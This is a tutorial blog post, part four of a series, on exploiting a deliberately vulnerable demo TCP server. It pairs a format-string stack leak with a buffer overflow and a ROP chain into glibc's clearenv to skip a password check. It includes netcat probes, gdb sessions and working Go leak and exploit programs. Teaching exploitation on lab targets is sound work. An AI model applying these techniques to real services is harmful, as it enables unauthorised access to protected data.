Leveraging glibc in exploitation - Part 4: An example
In part three, we introduced an example program named “big-roi” and discussed its defenses against binary exploitation. We can finally take everything we learned from the previous posts and build an exploit that leverages glibc.
Posts in this series
- Part one: What is glibc?
- Part two: Fingerprinting glibc
- Part three: Defenses
- Part four: An example
Putting theory into practice
In the previous part, I introduced a vulnerable example program named “big-roi”, and we examined some of the built-in defenses it possesses against binary exploitation. Now for the fun part - hacking!
The source code for big-roi can be found on GitLab.
To minimize the differences between your environment and my own, I recommend running the pre-compiled executable found within the git repository on an Ubuntu 20.04 system. The executable can be quasi-authenticated by diff’ing (or hashing) the included objdump disassembly with your own:
# Note: The provided objdump output uses "intel" syntax.
$ objdump -D -M intel big-roi > /tmp/big-roi.objdump.txt
$ diff big-roi.objdump.txt /tmp/big-roi.objdump.txt
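The application takes two arguments: a TCP port to listen on, and a file path to share. The user can optionally set a password by generating a crypt-style password hash and storing it in the PASSWORD_BCRYPT environment variable. (Despite the variable's name, the openssl passwd -5 command used below produces a SHA-256 crypt hash rather than a bcrypt one.) For example: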
# Note: This requires openssl.
# Refer to "man openssl-passwd" for more information.
$ export PASSWORD_BCRYPT=$(openssl passwd -5)
# <Type in a password and confirm it>
$ echo 'keith says to forget about it!' > /tmp/secret-data
$ ./big-roi 6666 /tmp/secret-data
Users can retrieve the file by connecting to the process over TCP and sending a password:
# Note: Make sure to not include a trailing newline character.
$ printf '%s' 'gfy' | nc 127.0.0.1 6666
incorrect password: gfy
$ printf '%s' '<actual password>' | nc 127.0.0.1 6666
keith says to forget about it!
Our goal will be to bypass the program’s password check by leveraging glibc. While this post will focus on the glibc angle, I highly encourage readers to explore other exploitation possibilities with the same security constraints we will be facing here.
Due to the complexity involved in explaining and illustrating a vulnerable program, any example will be at least slightly contrived. The more realistic the example, the more binary exploitation concepts it touches. The main goal of this example is to display something a well-intentioned programmer might implement as an experiment, which unfortunately became the next link in a chain an attacker was chomping on.
Bugs
There are two security bugs in the big-roi example. Feel free to search for them yourself before we discuss them in the next few sections - they are not meant to be difficult to find. The main theme of the bugs is that the developer got a little lazy, and made some unfortunate copy-paste choices and typos.
Outright memory corruption
Starting from the beginning of the source file, the first security bug of interest appears on lines 40 and 55.
The buf variable is a buffer (a chunk of memory) allocated on the call stack. We know it is allocated on the stack because it is a local variable, and its size (102 bytes) is known at compile time. While there is nothing inherently wrong with allocating a buffer on the stack, line 55 proceeds to read significantly more than 102 bytes into the buffer from socket, which is the connection with a TCP client. Perhaps the buffer’s size was a simple typo by the imaginary programmer :)
This is a classic stack-based buffer overflow bug. If you recall from part two of this series, the call stack (or “stack” as it is often called) is where the program stores everything a function needs to execute (such as local variables). It consists of many “stack frames”, each of which holds the state of one function call that is still in progress. A frame is identified by a beginning and end address. On an x86 64-bit CPU, this information is stored in two CPU registers:
- rsp (the “top” of the stack frame, “sp” meaning “stack pointer”)
- rbp (the “bottom” of the stack frame, “bp” meaning “base pointer”)
As the program executes functions, it updates the memory addresses stored in these two registers to point at different slices of the stack. Everything that falls between the addresses found in these registers constitutes the current stack frame.
The stack also stores information about the state of the program. For our part, we are interested in a very specific piece of program state: the saved return instruction pointer. This is a memory address that is used by the program to find its way back to the code that executed the current function. Unbeknownst to the programmer, this piece of information is stored alongside the programmer’s local variables.
When data “overflows” the area allocated for the programmer’s local variables, the overflowing data will eventually overwrite the saved return instruction pointer. When the function returns, the program will restore the corrupted return instruction pointer, resulting in the control flow of the program being subverted.
To be less abstract: a client could connect to big-roi, send more than 102 bytes of data, and overwrite the saved return instruction pointer with a new address. The attacker-controlled address itself is not executable code, but instead points to executable code the attacker would like to run. This can range from code contained in the vulnerable program, to code supplied by the attacker in the buf variable. In this case, we cannot place executable code in buf and execute it directly due to the non-executable call stack (this is discussed in detail in part three).
It should be noted that a stack-based buffer overflow can be utilized in other ways. For example, it could overwrite a variable that would permit the hacker to bypass an if condition. Here, we will turn this bug into a control flow manipulation capability.
Information leak
Not far from the stack-based buffer overflow, we can find our next bug on line 63, a format string vulnerability.
The program checks if the bcrypt password environment variable is set. It then validates the user-supplied password contained in buf against the bcrypt value with crypt. If that fails, the program writes a message back to the TCP client stating that the password was incorrect along with the password the client supplied. Unfortunately, the user-controlled password is supplied to the fprintf format string function as the format string argument. This means an attacker can control the format string specifiers passed to fprintf.
Format string vulnerabilities are probably worth a separate blog post due to the capabilities they grant to an attacker. If you are unfamiliar with format string vulnerabilities, the general issue lies in how format string functions work in C.
Imagine the following printf function call:
printf("%s");
While a valid format string specifier is supplied, there is no corresponding argument being passed to printf. In other words, we would normally expect to see:
printf("%s", "foo\n");
One might think that missing arguments would result in an empty string, a literal “%s”, or a placeholder string (like in Go) being written to stdout. Without going into too much detail, format string functions in C will essentially follow the calling convention of the Application Binary Interface (ABI) for the current processor architecture to find arguments.
On x86 64-bit processors, printf("%s") will treat whatever value is stored in the rsi CPU register as a pointer and look for a null-terminated string starting at that address. This occurs because the calling convention for x86 64-bit processors specifies that rdi holds the first argument for a function call (here, the format string itself) and rsi holds the second, which is where printf expects the argument for the first format specifier. When there are more format specifiers than there are argument-holding CPU registers, the format string function looks to the call stack. The function will read successive values from the stack and use them as arguments to the corresponding format specifiers.
The calling convention works a little differently on x86 32-bit processors in that CPU registers are not used for storing or pointing to arguments. Instead, arguments are stored on the call stack, and each successive argument is “popped” off the call stack.
The point is that even if you omit format specifier arguments, the format string function will look for corresponding arguments in places where it would ordinarily expect them. Once the format function “runs out of” CPU registers to check, it will access whatever happens to be stored on the call stack.
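To make the lookup order concrete, here is a minimal Go sketch that maps the n-th conversion in a format string to the place its value would come from. It assumes the System V AMD64 calling convention used on 64-bit Linux and a call shaped like fprintf(stream, fmt), as in big-roi. The helper name argSource is made up for illustration, and the sketch ignores floating-point conversions, which use a separate set of registers.

```go
package main

import "fmt"

// integerArgRegs lists the System V AMD64 registers that carry integer
// and pointer arguments, in order.
var integerArgRegs = []string{"rdi", "rsi", "rdx", "rcx", "r8", "r9"}

// argSource is a hypothetical helper. It reports where the n-th
// (zero-based) integer or pointer conversion gets its value when
// fixedArgs leading arguments (such as the stream and the format string
// itself) already occupy the first registers.
func argSource(n, fixedArgs int) string {
	slot := n + fixedArgs
	if slot < len(integerArgRegs) {
		return integerArgRegs[slot]
	}
	// Everything past the sixth integer argument is read from the
	// caller's stack, one 8-byte slot at a time.
	return fmt.Sprintf("stack+0x%x", (slot-len(integerArgRegs))*8)
}

func main() {
	// fprintf(stream, fmt): two fixed arguments precede the variadic ones.
	for n := 0; n < 6; n++ {
		fmt.Printf("%%p #%d <- %s\n", n, argSource(n, 2))
	}
}
```

Under these assumptions, only the first four conversions in an fprintf format string are served by registers. Every conversion after that reads the caller's stack, which is what makes the bug useful as a stack leak.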
Format string functions can also be used to overwrite a process' state in a controlled way, making format string vulnerabilities incredibly devastating. The information leak capability feeds into this by allowing the hacker to discover precisely where important process state resides in memory. Leaked memory addresses can then be supplied to a format string memory overwrite attack, allowing the hacker to overwrite memory in a targeted manner.
Chances are if you find a format string vulnerability, you now have access to both read and write primitives from a single bug. A recent example of this is a format string vulnerability in the wifid daemon in Apple iOS. Initially the bug was thought to be only useful for denial of service or a limited information leak. The researchers at “ZecOps” found a novel way to abuse Objective-C format string specifiers to overwrite memory, which allowed them to achieve remote code execution. 1
While we will be focusing on the information leak capability in this post, I highly recommend reading “Exploiting Format String Vulnerabilities” by “scut”, a hacker from the Austrian hacker group Team TESO. 2 This paper in particular provides one of the best explanations of format string vulnerabilities I have found so far.
Developing an exploit
There are potentially several ways to exploit big-roi. The method I have in mind will rely on the two bugs we just discussed. First, the format string vulnerability will allow us to leak data from the call stack. This solves two problems for us:
- Leaking the call stack canary
- Leaking glibc addresses
This will allow us to create a stack-based buffer overflow payload that will not trip the canary verification code or accidentally break other important process state. In addition, we can use the glibc addresses contained in the leak to fingerprint glibc. As we discussed in part two, this will allow us to locate helpful glibc functionality without having to worry about ASLR, or having to guess which version of glibc we are dealing with. Another reason for pursuing this is that the password cannot be leaked. The program does not possess a copy of the password to begin with because it uses a bcrypt hash to verify the user’s password.
What code should we execute then? Most CTF challenges are set up so we can simply execute “/bin/sh” to get a shell. In fact, there is a neat tool named “one_gadget”, which will search glibc for a block of code that spawns a shell by calling execve with “/bin/sh”. 3 Even if that helped us here, I think there is a more creative way to exploit this program.
Let’s think about the authentication code again (the same check that contains the format string vulnerability).
The optional authentication code only executes if the PASSWORD_BCRYPT environment variable is set. The program checks if the environment variable is set each time it authenticates the user. Since the program does not handle the client connection in a separate process, perhaps we can skip this code by unsetting the environment variable?
The C library (glibc) provides a few functions that accomplish this: unsetenv and clearenv. 4 5 Since clearenv requires no arguments, it is the easiest function to integrate into our exploit’s payload.
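The effect we are after can be illustrated with a small Go analogue. This is not big-roi's C code, only a sketch of the same idea: a check that consults the environment every time it runs stops firing once the environment has been wiped. The function names authRequired and clearenvDemo and the placeholder hash value are invented for this example. os.Clearenv plays the role of clearenv.

```go
package main

import (
	"fmt"
	"os"
)

const passwordVar = "PASSWORD_BCRYPT"

// authRequired mirrors the shape of big-roi's check: authentication is
// only performed if the variable is set at the moment of the check.
func authRequired() bool {
	_, isSet := os.LookupEnv(passwordVar)
	return isSet
}

// clearenvDemo reports whether authentication would be required before
// and after the process environment is wiped.
func clearenvDemo() (before, after bool) {
	// Placeholder value; a real deployment would store a password hash.
	if err := os.Setenv(passwordVar, "placeholder-hash"); err != nil {
		panic(err)
	}
	before = authRequired()

	// os.Clearenv removes every environment variable from this process,
	// much like clearenv(3) does for a C program.
	os.Clearenv()
	after = authRequired()

	return before, after
}

func main() {
	before, after := clearenvDemo()
	fmt.Printf("auth required before: %t, after: %t\n", before, after)
}
```

Because the change is made inside the running process, it persists for every later connection handled by that same process.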
Leaking call stack data
Let’s start by figuring out how to leak information from the call stack. The format string vulnerability (via fprintf) will make this pretty easy for us. Recall from part two that the layout of call stack memory remains the same across executions of the program. This means the stack layout should remain the same even if the program is running on a different computer.
Before we fire up gdb or run the program, we should try to understand exactly how much memory we can leak. Once we do that, we can conduct a format string attack and compare the output to what we see in gdb when fprintf begins execution.
We know we can supply up to <size-of-buf>/2 format specifiers because each format specifier consists of at least a % followed by one character - thus one format specifier costs two bytes of buf space. The %p format specifier is particularly interesting because it will cause the format string function to read a pointer’s-worth of memory at a time, and then format it as 0x<hex-encoded-value>. These attributes are important for several reasons:
- The 0x prefix can be treated as a delimiter, thus allowing us to easily parse the data into an array (more on the nuances of this later)
- By reading a pointer’s worth of memory at a time, we are guaranteed to respect the layout of the call stack. While pointer values are not the only data stored on the stack, values stored there must fit in the general purpose registers (on a 64-bit processor this means a pointer is 64 bits or 8 bytes)
- Since we can easily parse this data, we can treat each index in the resulting array as an individual element on the call stack
- %p is probably the easiest way to ensure we receive the most data per format specifier
While the buf variable allocates 102 bytes in the source file, in reality the compiler rounds that up to a multiple of the CPU’s word size (in this case, 64 bits, or 8 bytes). As a result, we actually have 104 bytes to work with. We can determine the maximum number of format specifiers that will fit in the buffer by dividing its length by two (each %p format specifier consumes two bytes). This means we can fit 52 format specifiers in the buffer. The format string function will then leak 52 pointer-sized chunks of memory, for a total of 416 bytes of memory from general purpose CPU registers and the call stack (52 * 8 = 416).
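The arithmetic above is small enough to check in a few lines of Go. This is only a sketch of the calculation as described in this post. The helper names roundUpToWord and leakBudget are invented here, and the rounding rule is the one assumed in the previous paragraph rather than something guaranteed by every compiler.

```go
package main

import "fmt"

const wordSize = 8 // bytes per pointer on x86-64

// roundUpToWord rounds n up to the next multiple of wordSize.
func roundUpToWord(n int) int {
	return (n + wordSize - 1) / wordSize * wordSize
}

// leakBudget returns how many two-byte "%p" specifiers fit in a buffer
// of bufLen bytes, and how many bytes of memory they would reveal.
func leakBudget(bufLen int) (specifiers, leakedBytes int) {
	specifiers = bufLen / 2
	return specifiers, specifiers * wordSize
}

func main() {
	bufLen := roundUpToWord(102)
	specifiers, leaked := leakBudget(bufLen)
	fmt.Printf("buffer: %d bytes, specifiers: %d, leaked: %d bytes\n",
		bufLen, specifiers, leaked)
}
```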
With that in mind, go ahead and start gdb and run the program:
$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ echo 'foobar' > /tmp/secret-data
$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data
Before we write automation that takes advantage of those neat %p attributes, we need to get a sense of what fprintf will spit out. This can be done with netcat:
# Here is what six "%p" values look like:
$ echo '%p%p%p%p%p%p' | nc 127.0.0.1 6666
incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
# Where the format  |   |             |   |    |             |          |
# specifiers fall:  |%p |%p           |%p |%p  |%p           |%p        |
As you can see, the format function does not pad each value with zeros. Values that are “zero” are represented with (nil) without a leading 0x. We can work around the latter inconsistency by replacing all instances of it with 0x00. Then we can treat 0x as a delimiter and split the string into an array. This is probably not the most efficient solution, but it is simple and effective.
Here is a simple Go application that does this using only the standard library:
src: cmd/leak/main.go
package main

import (
	"bytes"
	"errors"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
)

func main() {
	log.SetFlags(0)

	bufLenBytes := flag.Int("l", 104, "The length of the buf variable in bytes")
	flag.Parse()

	if flag.NArg() != 1 {
		log.Fatalln("please specify the address to connect to")
	}

	// Fill the buffer with as many two-byte "%p" specifiers as will fit.
	fmtStr := bytes.Repeat([]byte("%p"), *bufLenBytes/2)

	output, err := dialAndSendBytes(flag.Arg(0), fmtStr)
	if err != nil {
		log.Fatalf("failed to read all output - %s", err)
	}

	log.Printf("output from vulnerable program: '%s'", output)

	err = stackChunksFromFmtStr(output)
	if err != nil {
		log.Fatalf("failed to parse format string output - %s", err)
	}
}

// dialAndSendBytes connects to serverAddr, writes b, and returns
// everything the server sends back before closing the connection.
func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
	conn, err := net.Dial("tcp", serverAddr)
	if err != nil {
		return nil, fmt.Errorf("failed to dial - %w", err)
	}
	defer conn.Close()

	_, err = conn.Write(b)
	if err != nil {
		return nil, fmt.Errorf("failed to write data - %w", err)
	}

	output, err := io.ReadAll(conn)
	if err != nil {
		return nil, fmt.Errorf("failed to read all output - %w", err)
	}

	return output, nil
}

// Example format string output:
// incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
func stackChunksFromFmtStr(output []byte) error {
	if len(bytes.TrimSpace(output)) == 0 {
		return errors.New("format string func output is empty")
	}

	// "(nil)" has no "0x" prefix, so normalize it before splitting.
	output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
	chunks := bytes.Split(output, []byte("0x"))

	// Start at index 1 to skip "incorrect password: ".
	chunks = chunks[1:]

	for i, chunk := range chunks {
		log.Printf("chunk %d: %s", i, chunk)
	}

	return nil
}
Execute the Go program to leak a portion of the call stack:
$ go run cmd/leak/main.go 127.0.0.1:6666
output from vulnerable program: '<data-omitted-for-brevity>'
chunk 0: 68
# ...
chunk 21: 7ffff7f826a0
chunk 22: f
chunk 23: 55555555a9d0
chunk 24: d68
chunk 25: 7ffff7e29ad1
chunk 26: 7025702570257025
chunk 27: 7025702570257025
chunk 28: 7025702570257025
chunk 29: 7025702570257025
chunk 30: 7025702570257025
chunk 31: 7025702570257025
chunk 32: 7025702570257025
chunk 33: 7025702570257025
chunk 34: 7025702570257025
chunk 35: 7025702570257025
chunk 36: 7025702570257025
chunk 37: 7025702570257025
chunk 38: 7025702570257025
chunk 39: ca9055feff69a500
chunk 40: 5555555553e0
chunk 41: 5555555559d0
chunk 42: 7fffffffe550
chunk 43: 555555555768
chunk 44: 7fffffffe8c6
chunk 45: 400000000
chunk 46: 7fffffffe5d0
chunk 47: 5555555559c6
chunk 48: 7fffffffe6c8
chunk 49: 300000000
chunk 50: 555555554040
chunk 51: 1000f0b5ff
This output tells us where each chunk of call stack memory resides in the Go slice (if you are unfamiliar with Go, think of a slice as an array). We still need to figure out what these chunks are. The first order of concern is locating where the call stack canary and the saved return instruction pointer are. Once we figure that out, we can test our exploit in gdb. Testing in gdb not only allows us to practice without ASLR, but also allows us to troubleshoot our exploit if it fails.
Naturally, there are several ways to figure out where these important values reside. In this scenario, we will use eyeballs along with gdb.
One of the first things you might have noticed is the repeating 7025702570257025 chunks. If you hex decode that chunk, you will find it is a piece of the format string stored in reverse order (p%p%p%p%). This is due to x86 storing multi-byte values in little-endian order. We can identify the beginning and end indexes of the buf variable by simply looking for those chunks, which would be indexes 26 and 38, respectively.
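If you would rather not decode the hex by hand, the following Go sketch converts one %p chunk back into the bytes as they sit in memory. It relies only on the standard library. The helper name chunkToMemoryBytes is invented for this example, and it assumes the chunk is the hex text that follows the 0x prefix.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"strconv"
)

// chunkToMemoryBytes parses one hex chunk printed by %p and returns the
// eight bytes in the order they occupy memory on a little-endian machine.
func chunkToMemoryBytes(chunk string) ([]byte, error) {
	value, err := strconv.ParseUint(chunk, 16, 64)
	if err != nil {
		return nil, fmt.Errorf("failed to parse chunk %q - %w", chunk, err)
	}

	raw := make([]byte, 8)
	binary.LittleEndian.PutUint64(raw, value)

	return raw, nil
}

func main() {
	raw, err := chunkToMemoryBytes("7025702570257025")
	if err != nil {
		panic(err)
	}

	// The bytes in memory spell out a slice of our own format string.
	fmt.Printf("in memory: %q\n", raw)
}
```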
Finding the call stack canary is straightforward because:
- It will be placed after the local variables (of which buf is one)
- It is 64 bits (8 bytes) in size
- It usually begins with a 0x00 byte in memory (refer to part three for more details on this)
Looking at the chunks of memory that appear after buf, there is only one chunk that matches the criteria, which is chunk 39 with the value ca9055feff69a500 (again, reversed due to x86’s little-endianness). If there were other canary-looking chunks, we could jump into gdb to double-check our assumption - but that is not the case here.
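The eyeball test can also be written down as a rough heuristic. The Go sketch below is an assumption-laden illustration, not a reliable detector: it flags values whose lowest byte is zero and whose top 16 bits are set, on the theory that user-space pointers on x86-64 Linux have zeros in those top bits while a random canary usually does not. The names looksLikeCanary and findCanary are invented here. A real canary could occasionally fail this test, so gdb remains the tie-breaker.

```go
package main

import "fmt"

// looksLikeCanary applies the heuristics from the list above to a 64-bit
// value: the lowest byte (the first byte in memory) is zero, and the top
// two bytes are non-zero, unlike a typical user-space pointer.
func looksLikeCanary(v uint64) bool {
	lowByteIsZero := v&0xff == 0
	topBitsSet := v>>48 != 0
	return lowByteIsZero && topBitsSet
}

// findCanary returns the indexes of canary-looking values located after
// bufEnd, the index of the last chunk that belongs to buf.
func findCanary(chunks []uint64, bufEnd int) []int {
	var hits []int
	for i := bufEnd + 1; i < len(chunks); i++ {
		if looksLikeCanary(chunks[i]) {
			hits = append(hits, i)
		}
	}
	return hits
}

func main() {
	// Chunks 38 through 45 from the leak output shown earlier.
	const firstIndex = 38
	chunks := []uint64{
		0x7025702570257025, // last chunk of buf
		0xca9055feff69a500,
		0x5555555553e0,
		0x5555555559d0,
		0x7fffffffe550,
		0x555555555768,
		0x7fffffffe8c6,
		0x400000000,
	}

	for _, i := range findCanary(chunks, 0) {
		fmt.Printf("chunk %d looks like a canary: 0x%x\n", firstIndex+i, chunks[i])
	}
}
```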
The saved return instruction pointer is a bit trickier. To be completely honest, I expected only one chunk of memory between the canary and the saved return instruction pointer, which should be the previous stack frame’s base pointer. The saved return instruction pointer should follow after the saved base pointer. My expectation is based on various blog posts I have read. 6 7 8 In this case there are two chunks of memory that appear between the canary and the saved base pointer. I am not sure why this is, and I could not find any immediately obvious explanations for this behavior.
We can use gdb to help us find the saved return instruction pointer by pausing the program’s execution with ctrl+c. The info symbol command can then be used to trial and error our way to victory. This debugger command attempts to find a symbol (such as a function name) associated with a memory address. We can simply plug in the addresses that trail buf and look for one associated with the calling function (notifyNewClient):
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7eb9237 in __libc_accept (fd=3, addr=..., len=0x7fffffffe57c) at ../sysdeps/unix/sysv/linux/accept.c:26
26 in ../sysdeps/unix/sysv/linux/accept.c
# Chunk 40:
(gdb) info symbol 0x5555555553e0
_start in section .text of /tmp/big-roi
# Chunk 41:
(gdb) info symbol 0x5555555559d0
__libc_csu_init in section .text of /tmp/big-roi
# Chunk 42:
(gdb) info symbol 0x7fffffffe550
No symbol matches 0x7fffffffe550.
# And chunk 43 is our winner!
(gdb) info symbol 0x555555555768
notifyNewClient + 48 in section .text of /tmp/big-roi
Fantastic - chunk index 43 contains the saved return instruction pointer.
Exploiting the buffer overflow
Now that we know how to programmatically retrieve and reference the call stack canary and other important memory chunks, we can build a new Go slice variable containing our exploit payload. The slice can then be “serialized” into bytes, which will overwrite the process' call stack state when we write it to big-roi via TCP.
The final binary exploitation concept we need to discuss before exploiting big-roi is return-oriented programming (ROP). ROP will allow us to subvert control flow to clearenv, and then back to the original calling function. Like format string attacks, ROP has its own nuances and strategies that could fill a dedicated blog post. Full disclosure: I will simplify how ROP works here to keep things relatively concise and readable.
The “return” in ROP refers to the behavior of the ret CPU instruction, which looks up the saved return instruction pointer and jumps execution back to that address. The ret instruction accomplishes this by popping a pointer’s-worth of memory off the top of the call stack. It assumes that this chunk of memory is the saved return instruction pointer and jumps execution to whatever it points at. After the pop occurs, the stack pointer will be pointing at whatever happens to be next on the call stack. 9 This allows a hacker to execute code of their choosing by placing a sequence of addresses on the stack, each of which is consumed by a ret.
A collection of CPU instructions that concludes with the ret instruction is known as a “ROP gadget”. A hacker can change the control flow of a process by strategically placing the addresses of ROP gadgets on the stack. Upon finishing execution, each gadget executes the next gadget simply by executing its ret. This is known as a “ROP chain”. Using ROP to execute code in glibc is sometimes referred to as “ret2libc”.
In our case, we will implement a very basic ROP chain consisting of two gadgets: the clearenv function, and the original saved return instruction pointer. When clearenv finishes executing, it will ret to the original saved return instruction pointer that we strategically placed on the call stack. This will return us to the original calling function (notifyNewClient), which will then return back to the main function. Not only will this execute clearenv, but it will also guarantee that the process keeps running by resuming the original control flow.
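A toy model can help picture the chain. The Go sketch below is deliberately simplified and is not how a CPU works internally: it treats the stack as a list of addresses, and each simulated ret pops the next address and records which code it lands in. The type and function names are invented for this example. The two addresses are the ones observed in the gdb session in this post.

```go
package main

import "fmt"

// machine is a toy model: a stack of return addresses and a table that
// maps addresses to named code. It only mirrors the pop-and-jump
// behavior of ret described above.
type machine struct {
	stack []uint64          // stack[0] is the top of the stack
	code  map[uint64]string // address -> name of the code living there
	trace []string          // code visited, in order
}

// ret pops the next address off the stack and "jumps" to it. It returns
// false once the stack is empty.
func (m *machine) ret() bool {
	if len(m.stack) == 0 {
		return false
	}
	addr := m.stack[0]
	m.stack = m.stack[1:]
	m.trace = append(m.trace, m.code[addr])
	return true
}

// runChain executes a chain of addresses and returns the visited code.
func runChain(chain []uint64, code map[uint64]string) []string {
	m := &machine{stack: append([]uint64(nil), chain...), code: code}
	for m.ret() {
		// Each piece of code ends with its own ret, which starts the
		// next link in the chain.
	}
	return m.trace
}

func main() {
	code := map[uint64]string{
		0x7ffff7ddf830: "clearenv",
		0x555555555768: "notifyNewClient+48",
	}
	chain := []uint64{0x7ffff7ddf830, 0x555555555768}

	fmt.Println(runChain(chain, code))
}
```

In the real process the chain does not stop after the second entry. Once execution resumes inside notifyNewClient, the untouched stack frames beyond our payload take over and the program carries on as usual.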
We can test our exploit in gdb. That way we can defer fingerprinting glibc and explore ROP. To find a function’s address in gdb, we can use either of the following commands:
(gdb) info address clearenv
Symbol "clearenv" is at 0x7ffff7ddf830 in a file compiled without debugging.
(gdb) p &clearenv
$1 = (int (*)(void)) 0x7ffff7ddf830 <__clearenv>
Now that we know more about the call stack structure, here is what our exploit payload will look like:
+--------------------------------+
| 104 bytes to fill buf variable |
+--------------------------------+
| leaked call stack canary       |
+--------------------------------+
| leaked memory chunk 1          |
+--------------------------------+
| leaked memory chunk 2          |
+--------------------------------+
| leaked saved base pointer      |
+--------------------------------+
| address of the clearenv        |
| function in glibc              |
+--------------------------------+
| original saved return          |
| instruction pointer to         |
| notifyNewClient function       |
+--------------------------------+
As we discussed earlier, x86 stores data in memory in little-endian order. The %p format specifier prints each value as a number, with the most significant byte first, which is the reverse of how the bytes sit in memory. Because of this, we need to reverse the byte order of any chunks of memory that fprintf spits out before we send them back to big-roi. Failing to do so will create invalid memory addresses and will cause big-roi to crash.
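As a compact illustration of the layout and the byte-order fix together, here is a Go sketch that assembles the payload from 64-bit values using encoding/binary instead of reversing bytes by hand. It is an alternative take for illustration only. The function name buildPayload is invented, and the values in main are the ones from the gdb session shown in this post.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

// buildPayload lays out the overflow as in the diagram above: filler
// bytes for buf, followed by each 64-bit value in little-endian order.
func buildPayload(bufLen int, values ...uint64) []byte {
	payload := bytes.Repeat([]byte{'A'}, bufLen)

	word := make([]byte, 8)
	for _, v := range values {
		binary.LittleEndian.PutUint64(word, v)
		payload = append(payload, word...)
	}

	return payload
}

func main() {
	payload := buildPayload(104,
		0xca9055feff69a500, // leaked call stack canary
		0x5555555553e0,     // leaked memory chunk 1
		0x5555555559d0,     // leaked memory chunk 2
		0x7fffffffe550,     // leaked saved base pointer
		0x7ffff7ddf830,     // address of clearenv (from gdb)
		0x555555555768,     // original saved return instruction pointer
	)

	fmt.Printf("payload length: %d bytes\n", len(payload))
	fmt.Printf("bytes after buf: %x\n", payload[104:])
}
```

Working with uint64 values keeps the endianness conversion in one place, at the cost of parsing each leaked chunk into a number first.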
We can adapt the Go program from earlier to create a new slice containing the exploit payload from above, and then re-connect to get the contents of the secret file. That is what I have done here:
src: cmd/exploit/main.go
package main

import (
	"bytes"
	"encoding/hex"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
)

func main() {
	log.SetFlags(0)

	bufLenBytes := flag.Int(
		"l",
		104,
		"The length of the buf variable in bytes")
	csCanaryIndex := flag.Int(
		"c",
		39,
		"The index of the call stack canary in the format string output")
	numChunksUntilRIP := flag.Int(
		"r",
		3,
		"The number of memory chunks between the canary and RIP")
	flag.Parse()

	if flag.NArg() != 2 {
		log.Fatalln("please specify the address to connect to and the address of clearenv")
	}

	flag.VisitAll(func(f *flag.Flag) {
		if f.Value.String() == "" || f.Value.String() == "0" {
			log.Fatalf("please specify '-%s' - %s", f.Name, f.Usage)
		}
	})

	serverAddr := flag.Arg(0)
	clearenvAddr := fmtOutputToBytesOrExit([]byte(flag.Arg(1)))

	// Step 1: leak the call stack with the format string bug.
	fmtStr := bytes.Repeat([]byte("%p"), *bufLenBytes/2)
	output, err := dialAndSendBytes(serverAddr, fmtStr)
	if err != nil {
		log.Fatalf("failed to send initial payload - %s", err)
	}

	output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
	memoryChunks := bytes.Split(output, []byte("0x"))

	// Start at index 1 to skip "incorrect password: ".
	memoryChunks = memoryChunks[1:]
	log.Printf("initial output from vulnerable program: '%s'", output)

	// Make sure the leak is long enough to contain the saved RIP.
	ripIndex := *csCanaryIndex + *numChunksUntilRIP + 1
	if len(memoryChunks) <= ripIndex {
		log.Fatalf("leaked %d chunks, need at least %d", len(memoryChunks), ripIndex+1)
	}

	// Step 2: build the overflow payload, starting with filler for buf.
	exploitPayload := bytes.Repeat([]byte{0x41}, *bufLenBytes)

	csCanary := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex])
	log.Printf("call stack canary: '0x%x'", csCanary)
	exploitPayload = append(exploitPayload, wrongEndian(csCanary)...)

	// Preserve the chunks between the canary and the saved RIP.
	for i := 0; i < *numChunksUntilRIP; i++ {
		garbage := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+i+1])
		log.Printf("preserving chunk: '0x%x'", garbage)
		exploitPayload = append(exploitPayload, wrongEndian(garbage)...)
	}

	rip := fmtOutputToBytesOrExit(memoryChunks[ripIndex])
	log.Printf("existing return instruction pointer: '0x%x'", rip)

	// Return into clearenv first, then into the original caller.
	exploitPayload = append(exploitPayload, wrongEndian(clearenvAddr)...)
	log.Printf("clearenv address: '0x%x'", clearenvAddr)
	exploitPayload = append(exploitPayload, wrongEndian(rip)...)

	log.Printf("sending payload: 0x%x", exploitPayload)
	_, err = dialAndSendBytes(serverAddr, exploitPayload)
	if err != nil {
		log.Fatalf("failed to send exploit payload - %s", err)
	}

	// Step 3: reconnect; the password check should now be skipped.
	log.Println("getting secret file contents...")
	fileContents, err := dialAndSendBytes(serverAddr, []byte("\n"))
	if err != nil {
		log.Fatalf("failed to get file contents - %s", err)
	}

	log.Printf("secret file contents: '%s'", fileContents)
}

func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
	conn, err := net.Dial("tcp", serverAddr)
	if err != nil {
		return nil, fmt.Errorf("failed to dial - %w", err)
	}
	defer conn.Close()

	_, err = conn.Write(b)
	if err != nil {
		return nil, fmt.Errorf("failed to write data - %w", err)
	}

	output, err := io.ReadAll(conn)
	if err != nil {
		return nil, fmt.Errorf("failed to read all output - %w", err)
	}

	return output, nil
}

// fmtOutputToBytesOrExit hex decodes one "%p" chunk into 8 bytes,
// left-padding with zeros when the chunk is shorter than 8 bytes.
func fmtOutputToBytesOrExit(b []byte) []byte {
	var tmp []byte
	for i := range b {
		// Only include hex characters (0-9, A-F, a-f).
		if (b[i] > 0x2f && b[i] < 0x3a) || (b[i] > 0x40 && b[i] < 0x47) || (b[i] > 0x60 && b[i] < 0x67) {
			tmp = append(tmp, b[i])
		}
	}

	tmpStr := string(tmp)
	if len(tmp)%2 != 0 {
		tmpStr = "0" + tmpStr
	}

	addr, err := hex.DecodeString(tmpStr)
	if err != nil {
		log.Fatalf("failed to hex decode '%s' - %s", b, err)
	}

	finalAddr := make([]byte, 8)
	if len(addr) < 8 {
		copy(finalAddr[8-len(addr):], addr)
	} else {
		finalAddr = addr
	}

	return finalAddr
}

